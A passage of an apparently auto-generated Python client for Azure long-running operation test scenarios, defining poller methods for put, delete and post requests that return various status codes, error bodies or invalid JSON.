"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_non_retry201_creating400_invalid_json_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 with ProvisioningState=’Creating’. Poll the
endpoint indicated in the Azure-AsyncOperation header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_non_retry400(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 400 with an error body.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_non_retry400_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_non_retry400(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 with a location header.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete202_non_retry400_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry400(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_relative_retry400_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_non_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 400 with no error body.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_non_retry400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_non_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 with a location header.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_non_retry400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry400(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_relative_retry400_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_error201_no_provisioning_state_payload(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 201 to the initial request with no payload.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_error201_no_provisioning_state_payload_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_no_status(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_no_status_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_no_status_payload(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_no_status_payload_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete204_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 204 to the initial request, indicating success.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete204_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_no_status(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_relative_retry_no_status_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_no_location(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, without a location
header.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_no_location_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_no_payload(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_relative_retry_no_payload_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put200_invalid_json(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that is
not a valid json.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
